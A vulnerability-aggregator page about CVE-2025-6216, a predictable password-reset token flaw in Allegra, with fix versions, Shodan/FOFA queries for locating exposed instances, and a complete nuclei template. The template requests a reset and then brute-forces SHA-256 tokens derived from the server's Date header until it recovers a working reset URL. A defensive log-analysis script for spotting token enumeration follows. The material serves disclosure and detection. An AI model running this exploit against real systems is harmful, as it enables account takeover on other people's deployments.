Allegra Authentication Bypass via Predictable Password Reset Token

Vulnerability Information

Vulnerability name: Allegra Authentication Bypass via Predictable Password Reset Token

Vulnerability ID:

  • CVE: CVE-2025-6216

Vulnerability type: Privilege bypass

Severity: Critical

Description: Allegra is a widely used application, deployed mainly in enterprise services, that provides functions such as password recovery. Because it is so widely deployed, the impact of this vulnerability is broad. The vulnerability is a privilege bypass located in the password recovery mechanism. Its technical root cause is that the password reset token is generated from a predictable value, so an attacker can predict the token and bypass authentication. A remote attacker, without any authentication, can use the predictable password reset token to bypass authentication and gain unauthorized access to the application. An attacker could use this to access sensitive data, compromise system integrity, and potentially take full control of the affected system. Given the severity and ease of exploitation of this vulnerability, users are advised to upgrade immediately to Allegra version 8.1.4 or 7.5.2 or later.

Vendor: alltena

Product: Allegra

Affected versions: *

Search query: http.favicon.hash:"284403119" OR icon_hash="284403119"

Source: https://github.com/projectdiscovery/nuclei-templates/blob/b816cdef49659be2ec324328e32b8fea56bac23f/code%2Fcves%2F2025%2FCVE-2025-6216.yaml

Type: projectdiscovery/nuclei-templates:github issues

POC details


id: CVE-2025-6216

info:
  name: Allegra - Authentication Bypass via Predictable Password Reset Token
  author: iamnoooob,pdresearch
  severity: critical
  description: |
    Allegra calculateTokenExpDate Password Recovery Authentication Bypass Vulnerability. This vulnerability allows remote attackers to bypass authentication on affected installations of Allegra. Authentication is not required to exploit this vulnerability. The specific flaw exists within the password recovery mechanism. The issue results from reliance upon a predictable value when generating a password reset token. An attacker can leverage this vulnerability to bypass authentication on the application.
  impact: |
    An attacker can exploit this vulnerability to bypass authentication and gain unauthorized access to the application, potentially compromising sensitive data and system integrity.
  remediation: |
    Upgrade Allegra to version 8.1.4 or 7.5.2 or later to fix the predictable password reset token vulnerability.
  reference:
    - https://www.zerodayinitiative.com/advisories/ZDI-25-410/
    - https://alltena.com/en/resources/release-notes/release-notes-for-release-8-1-4-and-release-7-5-2
    - https://nvd.nist.gov/vuln/detail/CVE-2025-6216
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2025-6216
    cwe-id: CWE-640
    cpe: cpe:2.3:a:alltena:allegra:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: alltena
    product: allegra
    shodan-query: http.favicon.hash:"284403119"
    fofa-query: icon_hash="284403119"
  tags: cve,cve2025,allegra,auth-bypass,predictable-token,reset

variables:
  email: "admin@mydomainxxx.com" # Change to a test account

flow: http(1) && code()

http:
  - raw:
      - |
        POST /resetPassword.action HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8

        email={{email}}&fromAjax=true&_dc=1750669432104&perspectiveType=&appActionID=

    extractors:
      - type: regex
        name: date_header
        part: header
        internal: true
        group: 1
        regex:
          - "Date: (.*)"

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "emailSent"
          - '"success":true'
        condition: and

      - type: status
        status:
          - 200

code:
  - engine:
      - py
      - python3 # requires python to be pre-installed on system running nuclei

    source: |
      import requests
      import hashlib,os
      import time
      from datetime import datetime, timezone
      from email.utils import parsedate_to_datetime

      def get_server_time(response):
          date_header = response.headers.get('Date')
          if date_header:
              return parsedate_to_datetime(date_header)
          return None

      def main():
          BASE_URL = os.getenv("BaseURL")
          EMAIL = os.getenv("email")
          date_header = os.getenv("date_header")
          server_time = parsedate_to_datetime(date_header)
          if not server_time:
              return
          server_time_ms = int(server_time.timestamp() * 1000)
          expiry_time_ms = server_time_ms + 28800000
          base_expiry_sec = (expiry_time_ms // 1000) * 1000
          for ms in range(1000):
              candidate_expiry_ms = base_expiry_sec + ms
              token = hashlib.sha256(str(candidate_expiry_ms).encode()).hexdigest()
              test_url = f"{BASE_URL}/resetPassword!confirm.action?ctk={token}"
              r = requests.get(test_url, allow_redirects=False)
              if 'com.trackplus.app.logon.ResetPasswordApplication' in r.text:
                  print(test_url)
                  return

      if __name__ == "__main__":
          main()

    matchers:
      - type: dsl
        dsl:
          - contains(code_response, "/resetPassword!confirm.action?ctk=")

    extractors:
      - type: dsl # type of the extractor
        dsl:
          - '"Reset URL: " + code_response'
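The template's code step walks up to 1000 candidate ctk values against /resetPassword!confirm.action within seconds, and that burst is what a defender can look for in web-server logs while the upgrade is rolled out. The following Python is an added example, not part of the nuclei template or the Allegra project: it parses access-log lines and flags any client that presents many distinct ctk values to the confirm endpoint inside a short window. The log lines, client addresses and token values are constructed, and the window and threshold are assumed defaults to tune per environment.

```python
import re
from collections import defaultdict
from datetime import datetime
from urllib.parse import parse_qs, urlsplit

# Constructed combined-format access-log lines for this example (not real traffic):
# 203.0.113.7 cycles through candidate tokens within seconds; 198.51.100.4 follows a single link.
SAMPLE_LOG = """\
203.0.113.7 - - [14/Jul/2025:10:00:02 +0000] "GET /resetPassword!confirm.action?ctk=a1 HTTP/1.1" 302 0
203.0.113.7 - - [14/Jul/2025:10:00:02 +0000] "GET /resetPassword!confirm.action?ctk=a2 HTTP/1.1" 302 0
203.0.113.7 - - [14/Jul/2025:10:00:02 +0000] "GET /resetPassword!confirm.action?ctk=a2 HTTP/1.1" 302 0
203.0.113.7 - - [14/Jul/2025:10:00:03 +0000] "GET /resetPassword!confirm.action?ctk=a3 HTTP/1.1" 302 0
203.0.113.7 - - [14/Jul/2025:10:00:03 +0000] "GET /resetPassword!confirm.action?ctk=a4 HTTP/1.1" 302 0
203.0.113.7 - - [14/Jul/2025:10:00:04 +0000] "GET /resetPassword!confirm.action?ctk=a5 HTTP/1.1" 200 8812
198.51.100.4 - - [14/Jul/2025:10:05:00 +0000] "GET /resetPassword!confirm.action?ctk=b1 HTTP/1.1" 200 8812
"""

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')

def parse_confirm_events(log_text):
    """Return (client, timestamp, ctk) for each request to the confirm endpoint that carries a ctk."""
    events = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        client, ts, _method, target, _status = m.groups()
        parts = urlsplit(target)
        ctk = parse_qs(parts.query).get("ctk")
        if parts.path == "/resetPassword!confirm.action" and ctk:
            events.append((client, datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z"), ctk[0]))
    return events

def find_token_guessing(log_text, window_s=60, threshold=5):
    """Map client -> peak count of distinct ctk values it presented within any window_s seconds."""
    # A legitimate reset presents one token; many distinct tokens in seconds is enumeration.
    by_client = defaultdict(list)
    for client, when, ctk in parse_confirm_events(log_text):
        by_client[client].append((when, ctk))
    alerts = {}
    for client, evs in by_client.items():
        evs.sort()  # sliding window over time-ordered events
        start = 0
        for end in range(len(evs)):
            while (evs[end][0] - evs[start][0]).total_seconds() > window_s:
                start += 1
            distinct = len({c for _, c in evs[start:end + 1]})
            if distinct >= threshold:
                alerts[client] = max(alerts.get(client, 0), distinct)
    return alerts
```

Repeated presentations of the same token are counted once, so a user double-clicking a reset link does not trip the rule; only a spread of different tokens from one client does.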



http://example.com/2025/07/14/github_846879621/
Author: lianccc
Published: July 14, 2025